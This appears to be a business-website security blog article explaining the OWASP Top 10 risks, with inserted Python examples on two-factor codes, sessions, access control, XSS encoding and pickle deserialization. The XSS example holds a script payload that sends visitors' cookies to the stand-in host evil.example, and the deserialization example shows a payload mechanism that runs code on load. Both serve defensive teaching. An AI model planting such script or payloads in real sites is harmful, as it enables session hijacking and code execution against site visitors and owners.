Top 10 Most Critical Security Risks For Business Websites

Small businesses get hacked. Here are the most common risks to watch out for.


    Your business website is beautiful. It’s effective. It is consistently driving new traffic to your business. But it can still be a liability if it isn’t safe. To stay safe, it’s important to be aware of the most common security risks for business websites.

    We’ve all seen what happens in the business world when sensitive information gets compromised. And it’s not pretty. While web security is not the most glamorous of topics, it’s perhaps one of the most important issues to address when working on your business website.

    Security can be a dense issue to navigate, especially if you’re not a software developer. But it’s still important to understand the basics to make sure that your web provider is taking care of you, and your customers, in the way that you expect.

    So where can we get started?

    Yes, Small Businesses Are At Risk Too

    Well, the first step is acknowledging that there are a number of security risks for business websites, especially small businesses. It’s easy to think that only huge corporations like Amazon, Target, and the like are in the crosshairs for attackers.

    But just because your business is small, doesn’t mean it’s not a target.

    A common misconception is that attackers pick out your website by hand. In reality, most attacks are automated: scanners sweep the internet for any site running software with a known weakness, and your site gets hit because it matches, not because of who you are.

    Most websites are powered by a CMS or web application, and some of these are more secure than others. Not every risk discussed below will apply to your business. But as a rule, the more software your site depends on (the CMS itself, plugins, themes, a CRM integration, and so on), the larger its attack surface, and the more of these risks apply.

    How is Risk Assessed, Anyways?

    In what ways can your website fall vulnerable to security risks?

    The Open Web Application Security Project (OWASP) is an “open community dedicated to enabling organizations to develop, purchase, and maintain applications and APIs that can be trusted.” They keep an eye on major threats and provide guidance for developers around the world. They also have tons of free resources to help further the mission of an open and secure web.

    One of these resources is their Top 10 Security Risks document, revised in 2017 (OWASP has since published a 2021 edition; the list below follows the 2017 one). In it, they take a comprehensive look at the 10 biggest security risks for web applications. Just in case you don’t have the time to get a software engineering degree, we thought we would break it down and explain why each is important.

    There are 4 basic dimensions OWASP uses to score each risk. Each is rated from 1 to 3, and on every dimension a higher number is worse for you:

    • Exploitability: how easy it is for an attacker to carry out the attack (1: difficult to exploit, 3: easy to exploit)
    • Prevalence: how commonly the weakness turns up in real applications (1: uncommon, 3: widespread)
    • Ease of detection (OWASP calls this detectability): how easily an attacker can find the weakness in your site, not how easily you can spot the attack (1: hard to find, 3: easy to find)
    • Technical impact: how much havoc a successful attack can wreak (1: minor impact, 3: severe impact)

    Here’s a table, based on the OWASP report, showing how the ten most prevalent security risks for business websites score on those 4 dimensions.

    Risk                                  Exploitability   Prevalence   Ease of Detection   Technical Impact
    Injection Flaws                             3               2                3                  3
    Broken Authentication                       3               2                2                  3
    Sensitive Data Exposure                     2               3                2                  3
    XML External Entities                       2               2                3                  3
    Broken Access Control                       2               2                2                  3
    Security Misconfiguration                   3               3                3                  2
    Cross-Site Scripting                        3               3                3                  2
    Insecure Deserialization                    1               2                2                  3
    Using Components w/ Vulnerabilities         2               3                2                  2
    Insufficient Monitoring/Logging             2               3                1                  2

    Let’s get into the specific security risks for business websites:

    Risk #1: Injection Flaws

    Exploitability: 3, Prevalence: 2, Ease of Detection: 3, Technical Impact: 3

    The web runs on requests and data transfers. Code in the browser, on the server and in the database passes requests and data from one component to the next, and at several of those hand-offs the data is given to an interpreter: a SQL database, an operating-system shell, an LDAP directory.

    An injection flaw happens when untrusted input (a form field, a URL parameter, a cookie) is pasted into one of those commands as text, so the interpreter cannot tell where the command ends and the data begins. An attacker who controls that input can make the system run commands it was never meant to run, or read and change data it was never meant to expose.

    It’s common, it’s easy to exploit, and it can compromise the whole system, up to full takeover of the site. Injection bugs in popular CMS platforms and their plugins have repeatedly exposed large numbers of websites at once.

    The solution? The real fix lives in the code: developers must keep data and commands separate, for example by using parameterised (prepared) queries instead of building SQL strings out of user input. Short of being a developer, the best you can do is update, update, update! Developers and researchers are constantly finding such bugs, and when they do, a patch follows.

    Staying current on software reduces the risk because those patches are actually applied on your site. The older an unpatched application, the more likely a working exploit for it is already public and built into the attackers’ automated tools.

    Risk #2: Broken Authentication

    Exploitability: 3, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    Do your customers have accounts on your website? When your clients log in, you’re authenticating their identity: checking that they are who they say they are, so that private information stays private.

    When authentication is weak or broken, it allows hackers to assume someone’s identity in that system. They can pretend to be that authenticated user and commit all sorts of fraudulent activity.

    The reality is that attackers have access to hundreds of millions of valid username/password combinations from past breaches, and they try them against other sites by the thousand (credential stuffing). Since many people reuse passwords and never change them, this works far too often; a password manager helps. Attackers also look for default or leftover admin accounts, and they run automated tools that find weak login and session handling in sites at scale.

    And they may only need access to one account to infiltrate your system.

    To protect against this kind of attack, set up multi-factor authentication wherever possible; a stolen password alone is then not enough. Also, pay attention to session management: set an idle timeout and a maximum session lifetime, issue session cookies that the browser discards when it closes, and invalidate the session on the server at logout. Any session left open is a session an attacker can take over.
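    The two controls just described, as an added example (not code from the original article): a time-based one-time code check in the RFC 6238 style that authenticator apps use, and a server-side session store with both an idle and an absolute timeout. The secret key is the RFC 6238 reference key, and the clock values, timeouts and cookie name are demo choices.

```python
"""Added example: a TOTP second factor (RFC 6238) and a session store with
idle and absolute timeouts, standard library only. Inputs are constructed."""
import hashlib
import hmac
import secrets
import struct


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    # RFC 6238: HMAC-SHA1 over the 8-byte big-endian time counter, dynamic
    # truncation (RFC 4226), then the last `digits` decimal digits.
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def verify_totp(secret: bytes, code: str, unix_time: int, window: int = 1) -> bool:
    # Accept the current step plus `window` steps either side for clock
    # skew, comparing in constant time.
    for drift in range(-window, window + 1):
        if hmac.compare_digest(totp(secret, unix_time + drift * 30), code):
            return True
    return False


class SessionStore:
    """Sessions expire after `idle` seconds without activity and after
    `absolute` seconds regardless of activity."""

    def __init__(self, idle: int = 15 * 60, absolute: int = 8 * 3600):
        self.idle, self.absolute = idle, absolute
        self._sessions = {}

    def create(self, username: str, now: float) -> str:
        sid = secrets.token_urlsafe(32)          # unguessable identifier
        self._sessions[sid] = {"user": username, "created": now, "last": now}
        return sid

    def lookup(self, sid: str, now: float):
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last"] > self.idle or now - s["created"] > self.absolute:
            self.revoke(sid)                     # expired: log the user off
            return None
        s["last"] = now
        return s["user"]

    def revoke(self, sid: str) -> None:
        self._sessions.pop(sid, None)


def session_cookie(sid: str) -> str:
    # No Max-Age/Expires, so the browser discards it when closed; HttpOnly
    # keeps page scripts away from it; Secure restricts it to HTTPS.
    return f"session={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def demo() -> dict:
    # RFC 6238 Appendix B reference key: at T=59 the 8-digit code is
    # 94287082, so the 6-digit code is 287082.
    key = b"12345678901234567890"
    store = SessionStore(idle=600)
    sid = store.create("alice", now=1000.0)
    return {
        "code_at_59": totp(key, 59),
        "accepted": verify_totp(key, "287082", 59),
        "rejected": verify_totp(key, "000000", 59),
        "active": store.lookup(sid, now=1300.0),    # 5 min later: still live
        "idle_out": store.lookup(sid, now=2000.0),  # 700 s idle: expired
        "cookie": session_cookie("abc"),
    }


if __name__ == "__main__":
    print(demo())
```

    A phished or leaked password fails at the second step, and an abandoned logged-in browser stops being useful to anyone after the idle timeout. In a real deployment the TOTP secret is generated per user and shared once via a QR code, and the store would live in a database or cache rather than a dictionary.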

    Risk #3: Sensitive Data Exposure

    Exploitability: 2, Prevalence: 3, Ease of Detection: 2, Technical Impact: 3

    OWASP notes that over the last few years this has been the most common impactful attack. Sensitive data gets exposed when software stores it in clear text, sends it over unencrypted connections, protects it with weak or outdated cryptography, or leaks it through URLs, logs and error messages.

    While most small business owners don’t construct URLs themselves, it’s worth knowing that if you see personal information, a password or a reset token in the browser’s address bar, you should ask some questions: URLs end up in browser history, server logs and the Referer header sent to other sites.

    Also, keep an eye out for certificate warnings. When Chrome says “Your connection is not private”, or another browser warns that the certificate does not match the site, the name on the certificate and the site you reached are different, or the certificate has expired, and the traffic may not be protected in transit.

    If your own site shows such a warning, let us know.

    Risk #4: XML External Entities

    Exploitability: 2, Prevalence: 2, Ease of Detection: 3, Technical Impact: 3

    XML documents can instruct the parser, inside the document itself, to fetch external references (external entities). If an application parses XML supplied by an attacker with that feature enabled, the parser can be made to read local files (such as password or configuration files), reach services on the internal network, or tie up the server.

    It’s an important risk for developers but isn’t usually relevant for small business websites unless your site accepts XML uploads or talks to XML-based (SOAP) APIs. If it does, make sure that your web developer and support service have external entity resolution disabled in the parser.

    Risk #5: Broken Access Control

    Exploitability: 2, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    It’s important to control who has access to which portions of your website.

    This shouldn’t be confused with broken authentication (Risk #2). Authentication checks who a user is; access control decides what that user is allowed to see and do.

    For example, let’s say you give a contractor admin privileges to your website. Did you remove that access when they were no longer working for you? What about your Google information? Your email service?

    The more lapsed-but-still-valid access points to your system, the more vulnerable you are. Attackers can get in and modify your data without you even knowing it, and employees with more access than they need can break something, intentionally or not. The same idea applies inside the application: a customer should be able to see only their own orders, not another customer’s by changing a number in the URL. So make sure you always know who has access to what, and that every request is checked against it!
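    An added example (not code from the original article) of what that checking looks like in an application: a deny-by-default authorize function that tests both the user’s role and, for objects that belong to someone, ownership, plus a review that finds grants whose end date has passed, as in the contractor case above. The roles, permissions, users and dates are all constructed for the demo.

```python
"""Added example: deny-by-default authorization with an ownership check,
and a review of lapsed access grants. All data is constructed."""
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class User:
    name: str
    role: str             # "admin", "editor" or "customer"


@dataclass(frozen=True)
class Invoice:
    id: int
    owner: str


ROLE_PERMISSIONS = {
    "admin": {"invoice:read", "invoice:delete", "site:configure"},
    "editor": {"post:edit"},
    "customer": {"invoice:read"},
}


def authorize(user: User, action: str, resource=None) -> bool:
    # Deny unless the role grants the action AND, for owned objects, the
    # caller owns it. Checking the role alone is the classic mistake: any
    # customer could then read invoice 17 by editing the id in the URL.
    if action not in ROLE_PERMISSIONS.get(user.role, set()):
        return False
    if isinstance(resource, Invoice) and user.role != "admin":
        return resource.owner == user.name
    return True


@dataclass(frozen=True)
class Grant:
    who: str
    role: str
    ends: Optional[date]  # None means permanent staff


def stale_grants(grants, today: date):
    # Access with an end date in the past that was never revoked.
    return [g for g in grants if g.ends is not None and g.ends < today]


def demo() -> dict:
    alice = User("alice", "customer")
    bob = User("bob", "customer")
    root = User("root", "admin")
    inv = Invoice(17, owner="alice")
    grants = [Grant("dev-contractor", "admin", date(2023, 3, 31)),
              Grant("owner", "admin", None)]
    return {
        "own_invoice": authorize(alice, "invoice:read", inv),
        "others_invoice": authorize(bob, "invoice:read", inv),
        "admin_any": authorize(root, "invoice:read", inv),
        "customer_config": authorize(alice, "site:configure"),
        "stale": [g.who for g in stale_grants(grants, date(2024, 1, 1))],
    }


if __name__ == "__main__":
    print(demo())
```

    The point of the ownership test is that the check happens on the server for every request, regardless of what the page’s menus show; hiding a link is not access control. Running the grant review on a schedule is the cheapest way to catch the contractor who still has admin a year later.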

    Risk #6: Security Misconfiguration

    Exploitability: 3, Prevalence: 3, Ease of Detection: 3, Technical Impact: 2

    This is perhaps the most common risk we see business websites exposed to: default configurations and poor password protection for the components of your system, unused features and accounts left switched on, and verbose error messages that reveal how the site is built.

    Let’s say you buy a router. Or a printer. Or a shared storage system, cloud-based or otherwise. That new component came with a default username and password. Let’s say you set it up and didn’t change that password.

    If an attacker has a list of default usernames and passwords at the ready, they can jump right into your system.

    Change default credentials the moment something is set up, turn off features and accounts you don’t use, and review the configuration again after every update. If you leave insecure defaults on your system, you are asking for trouble.

    Risk #7: Cross-Site Scripting

    Exploitability: 3, Prevalence: 3, Ease of Detection: 3, Technical Impact: 2

    Let’s imagine for a moment that your website can act as an unwitting accomplice for an attacker. A visitor arrives at your site, and the attacker uses YOUR pages to run a script in that visitor’s browser, hijack their session, or redirect them to a malicious site.

    Sadly, you don’t have to imagine: that threat is all too real. (And fairly common.)

    With cross-site scripting, an attacker plants script in content your site displays (a comment, a search term echoed back, a profile field), and it runs with your site’s privileges in every visitor’s browser: it can read cookies and other sensitive information, redirect traffic, and even modify your existing page!

    There are ways to prevent this: encoding every piece of user-supplied data before it is written into a page, so the browser treats it as text rather than code, and adding a Content Security Policy so that injected script is blocked even if an encoding is missed. Make sure the support team for your website knows these mitigations and applies them.
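    The same comment-rendering code with and without output encoding, as an added example (not code from the original article or from any CMS), together with the response headers that limit what an injected script could do. The page fragment, the payload and the policy are constructed for the demo.

```python
"""Added example: reflected/stored XSS in a comment renderer, the encoded
version that neutralises it, and defence-in-depth headers. Constructed data."""
import html

# A constructed payload of the kind left in a comment field: it would ship
# every visitor's cookies to the attacker.
PAYLOAD = '<script>document.location="https://evil.example/?c="+document.cookie</script>'


def render_vulnerable(comment: str) -> str:
    # Attacker text is dropped straight into the page: the browser runs it.
    return f"<p class='comment'>{comment}</p>"


def render_safe(comment: str) -> str:
    # Output encoding: <, >, &, and quotes become entities, so the browser
    # shows the text instead of executing it. Encode at output time and per
    # context (this is the HTML-body encoder; attributes, URLs and script
    # blocks each need their own).
    return f"<p class='comment'>{html.escape(comment, quote=True)}</p>"


def security_headers() -> dict:
    # Defence in depth: even if one encoding is missed, CSP blocks inline
    # scripts and off-site script loads, and the cookie flags in Risk #2 keep
    # the session cookie out of reach of any script that does run.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
        "X-Content-Type-Options": "nosniff",
    }


def demo() -> dict:
    return {
        "vulnerable": render_vulnerable(PAYLOAD),
        "safe": render_safe(PAYLOAD),
        "headers": security_headers(),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

    The vulnerable output contains a live script element; the safe output shows the visitor the literal text of the attack, which is harmless. Template engines used by modern CMSs do this encoding automatically, which is why the dangerous cases are usually custom code and plugins that bypass the template.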

    Risk #8: Insecure Deserialization

    Exploitability: 1, Prevalence: 2, Ease of Detection: 2, Technical Impact: 3

    Converting data into a stream of bytes to store or transfer it is called serialization; turning the bytes back into objects is deserialization. The risk arises when an application deserializes data it received from an untrusted source: many object serialization formats let the data itself say which classes to build and which code to run, so an attacker who can supply the bytes can often run their own code on the server.

    It’s tough to exploit from the outside, so it isn’t the number one thing on the radar of most small business sites. Just make sure that your software never deserializes untrusted input with a native object format, and uses a plain data format such as JSON wherever data crosses a trust boundary.
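    What “the data says which code to run” means in practice, as an added example (not code from the original article): Python’s pickle format is used because it shows the mechanism in a few lines, and the “payload” is constructed and deliberately harmless, recording only that it ran. The allow-list in the restricted loader and the JSON document are demo choices.

```python
"""Added example: untrusted deserialization with pickle, a restricted
unpickler that refuses unexpected classes, and JSON as the safe alternative.
The payload is constructed and harmless."""
import io
import json
import pickle

EXECUTED = []


def attacker_callback(marker: str) -> str:
    # Stands in for what a real payload would call (os.system, subprocess...).
    EXECUTED.append(marker)
    return marker


class Payload:
    # pickle honours __reduce__: on load it calls the returned callable with
    # the returned arguments. Attacker-chosen bytes => attacker-chosen call.
    def __reduce__(self):
        return (attacker_callback, ("code ran during deserialization",))


class RestrictedUnpickler(pickle.Unpickler):
    # Allow-list of the only classes this application expects to receive.
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "str")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing to load {module}.{name}")


def load_untrusted_pickle(blob: bytes):
    return pickle.loads(blob)                     # vulnerable


def load_restricted(blob: bytes):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def demo() -> dict:
    blob = pickle.dumps(Payload())                # what an attacker would send
    EXECUTED.clear()
    load_untrusted_pickle(blob)                   # runs attacker_callback
    ran = list(EXECUTED)
    try:
        load_restricted(blob)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    # Safest: a data-only format. JSON has no way to say "call this".
    safe = json.loads('{"user": "alice", "cart": [1, 2]}')
    return {"ran": ran, "blocked": blocked, "json": safe}


if __name__ == "__main__":
    print(demo())
```

    The first loader runs the attacker’s function before any application code gets a look at the data; the restricted loader refuses as soon as it meets a class not on the list; JSON never had the capability to begin with. The same pattern appears in PHP’s unserialize() and Java object streams, which is where most real-world cases come from.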

    Risk #9: Using Components With Known Vulnerabilities

    Exploitability: 2, Prevalence: 3, Ease of Detection: 2, Technical Impact: 2

    Your site is only as secure as the components that it uses.

    When installing libraries, plugins, frameworks and the like, be sure that they are maintained, verified and up to date. Like we mention in our Ultimate Guide To Securing Your Business Website, most people gravitate toward free, open-source options when it comes to themes and plugins. Free is not the problem; abandonment is. A plugin nobody maintains any more will never get a fix, and a published vulnerability in it is an open invitation.

    And if you install an insecure component, you put the whole site at risk.

    This risk can be particularly acute if you’re using a self-hosted CMS (like WordPress!) and using plugins to get custom functionality. So make sure that your web developer/support team is vetting components appropriately, removing the ones you no longer need, and giving each of them only the access it requires. Tools such as wpscan (for WordPress), npm audit and pip-audit check installed components against published vulnerability databases and should be part of routine maintenance.

    Risk #10: Insufficient Logging & Monitoring

    Exploitability: 2, Prevalence: 3, Ease of Detection: 1, Technical Impact: 2

    If your site isn’t consistently logging information, and those logs aren’t being consistently monitored, you won’t know when attackers have broken into your system. Once inside, they can persist for months and pivot into other systems.

    Accurate logging, regularly reviewed, together with a plan for responding to what it shows, is what lets you discover a breach at all. The more detailed your logging (logins, failed logins, admin actions and input validation failures, each with a timestamp and source address), and the better your monitoring, the better the chances of catching aberrant behaviour quickly. So again, be sure that your website is being monitored and supported!

    Duke Kimball

    Duke writes words, good. When he's not crafting content for The Pros, he's crafting stories, enjoying craft beer, or gourmet coffee. He is Portlandia.
